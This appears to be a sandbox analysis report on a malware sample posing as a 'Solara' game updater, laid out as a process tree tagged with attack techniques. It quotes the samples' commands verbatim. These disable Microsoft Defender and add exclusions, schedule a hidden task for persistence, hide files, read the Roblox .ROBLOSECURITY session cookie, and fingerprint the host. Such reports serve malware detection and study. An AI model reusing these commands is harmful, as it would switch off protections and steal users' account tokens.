PID 2508 wrote to memory of 852	2508	sol.exe	44
PID 2508 wrote to memory of 852	2508	sol.exe	44
PID 2508 wrote to memory of 852	2508	sol.exe	44
PID 3036 wrote to memory of 1200	3036	Solara_Updater.exe	45
PID 3036 wrote to memory of 1200	3036	Solara_Updater.exe	45
PID 3036 wrote to memory of 1200	3036	Solara_Updater.exe	45
PID 3036 wrote to memory of 2020	3036	Solara_Updater.exe	46
PID 3036 wrote to memory of 2020	3036	Solara_Updater.exe	46
PID 3036 wrote to memory of 2020	3036	Solara_Updater.exe	46
PID 3036 wrote to memory of 2020	3036	Solara_Updater.exe	46
PID 3036 wrote to memory of 2500	3036	Solara_Updater.exe	47

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2928	attrib.exe
1648	attrib.exe
1920	attrib.exe
1980	attrib.exe
2708	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3016
- C:\Users\Admin\AppData\Local\Temp\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2108
- - C:\Users\Admin\AppData\Local\Temp\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:3028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:576
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"
      4⤵
      Creates scheduled task(s)
      PID:2728
- - C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
    "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1796
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2560
  - - C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
      4⤵
      Views/modifies file attributes
      PID:1648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1612
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2072
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1716
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:2788
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:2820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      PID:1144
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2376
  - - C:\Windows\system32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
      4⤵
      PID:1820
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        Runs ping.exe
        
        PID:2632
- C:\Users\Admin\AppData\Local\Temp\sol.exe
  "C:\Users\Admin\AppData\Local\Temp\sol.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1208
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
    3⤵
    PID:2300
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
      4⤵
      Loads dropped DLL
      PID:912
    - - C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        5⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2488
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3bmj1ral\3bmj1ral.cmdline"
        6⤵
        Drops file in System32 directory
        
        PID:1644
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES97CD.tmp" "c:\Windows\System32\CSC67B74F05EB6444C0B29EB1143C9BD7.TMP"
        7⤵
        
        PID:2656
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AzSiKwgWjv.bat"
        6⤵
        
        PID:2364
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:268
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:1304
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet\bridgeblockportComBroker.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1572
- C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
  "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2664
- - C:\Users\Admin\AppData\Local\Temp\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
    3⤵
    - Executes dropped EXE
    PID:2572
- - C:\Users\Admin\AppData\Local\Temp\sol.exe
    "C:\Users\Admin\AppData\Local\Temp\sol.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3024
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
      4⤵
      PID:2800
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        5⤵
        Loads dropped DLL
        
        PID:1948
      - C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1312
- - C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
    "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2368
  - - C:\Users\Admin\AppData\Local\Temp\Loader.exe
      "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
      4⤵
      Executes dropped EXE
      PID:2916
  - - C:\Users\Admin\AppData\Local\Temp\sol.exe
      "C:\Users\Admin\AppData\Local\Temp\sol.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1572
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        5⤵
        
        PID:1756
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        6⤵
        Loads dropped DLL
        
        PID:1832
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:556
  - - C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
      "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1616
    - - C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        5⤵
        Executes dropped EXE
        
        PID:1624
    - - C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2508
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        6⤵
        
        PID:852
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        7⤵
        Loads dropped DLL
        
        PID:2732
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2992
    - - C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3036
      - C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        6⤵
        Executes dropped EXE
        
        PID:1200
      - C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        6⤵
        Executes dropped EXE
        
        PID:2020
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        7⤵
        
        PID:320
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        8⤵
        Loads dropped DLL
        
        PID:2600
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2084
      - C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        6⤵
        
        PID:2500
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        7⤵
        Executes dropped EXE
        
        PID:604
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        7⤵
        Executes dropped EXE
        
        PID:2912
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        8⤵
        
        PID:2292
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        9⤵
        Loads dropped DLL
        
        PID:1980
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:588
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        7⤵
        
        PID:632
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        8⤵
        Executes dropped EXE
        
        PID:2384
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        8⤵
        Executes dropped EXE
        
        PID:1536
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        9⤵
        
        PID:2948
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        10⤵
        Loads dropped DLL
        
        PID:1596
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:340
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        8⤵
        
        PID:1080
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        9⤵
        Executes dropped EXE
        
        PID:296
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        9⤵
        Executes dropped EXE
        
        PID:2936
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        10⤵
        
        PID:2428
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        11⤵
        Loads dropped DLL
        
        PID:2976
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        9⤵
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        10⤵
        Executes dropped EXE
        
        PID:2992
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        10⤵
        Executes dropped EXE
        
        PID:1592
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        11⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        12⤵
        Loads dropped DLL
        
        PID:2148
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1344
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        10⤵
        
        PID:2092
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        11⤵
        Executes dropped EXE
        
        PID:2760
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        11⤵
        Executes dropped EXE
        
        PID:2920
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        12⤵
        
        PID:2208
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        13⤵
        Loads dropped DLL
        
        PID:1060
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        14⤵
        Executes dropped EXE
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        11⤵
        
        PID:880
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2880
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2972
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        13⤵
        Executes dropped EXE
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        12⤵
        Executes dropped EXE
        
        PID:2900
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        13⤵
        
        PID:1672
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        14⤵
        Loads dropped DLL
        
        PID:1960
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        15⤵
        Executes dropped EXE
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        12⤵
        
        PID:2704
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        13⤵
        Executes dropped EXE
        
        PID:380
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        13⤵
        Executes dropped EXE
        
        PID:1100
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        14⤵
        
        PID:2780
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        15⤵
        Loads dropped DLL
        
        PID:1664
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        16⤵
        Executes dropped EXE
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        13⤵
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        14⤵
        Executes dropped EXE
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        14⤵
        Executes dropped EXE
        
        PID:1592
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        15⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        16⤵
        Loads dropped DLL
        
        PID:2104
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        17⤵
        
        PID:2484
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        14⤵
        
        PID:2988
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        15⤵
        Executes dropped EXE
        
        PID:1636
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        15⤵
        Executes dropped EXE
        
        PID:2824
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        16⤵
        
        PID:1708
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        17⤵
        Loads dropped DLL
        
        PID:2620
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        18⤵
        
        PID:1312
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        15⤵
        
        PID:2976
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        16⤵
        Executes dropped EXE
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        16⤵
        Executes dropped EXE
        
        PID:2548
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        17⤵
        
        PID:2940
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        18⤵
        Loads dropped DLL
        
        PID:808
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        19⤵
        
        PID:1076
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        16⤵
        
        PID:1648
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        17⤵
        Executes dropped EXE
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        17⤵
        Executes dropped EXE
        
        PID:992
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        18⤵
        
        PID:2596
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        19⤵
        Loads dropped DLL
        
        PID:944
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        20⤵
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        17⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        18⤵
        Executes dropped EXE
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        18⤵
        Executes dropped EXE
        
        PID:2704
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        19⤵
        
        PID:2076
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        20⤵
        Loads dropped DLL
        
        PID:2900
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        21⤵
        
        PID:1860
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        18⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        19⤵
        Executes dropped EXE
        
        PID:2860
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        19⤵
        Executes dropped EXE
        
        PID:2280
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        20⤵
        
        PID:1360
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        21⤵
        Loads dropped DLL
        
        PID:2868
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        22⤵
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        19⤵
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        20⤵
        Executes dropped EXE
        
        PID:2060
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        20⤵
        Executes dropped EXE
        
        PID:2776
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        21⤵
        
        PID:1784
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        22⤵
        Loads dropped DLL
        
        PID:2300
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        23⤵
        
        PID:2024
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        20⤵
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        21⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:760
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        22⤵
        
        PID:700
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        22⤵
        Drops file in Drivers directory
        
        PID:2852
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:2364
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        23⤵
        Views/modifies file attributes
        
        PID:1920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
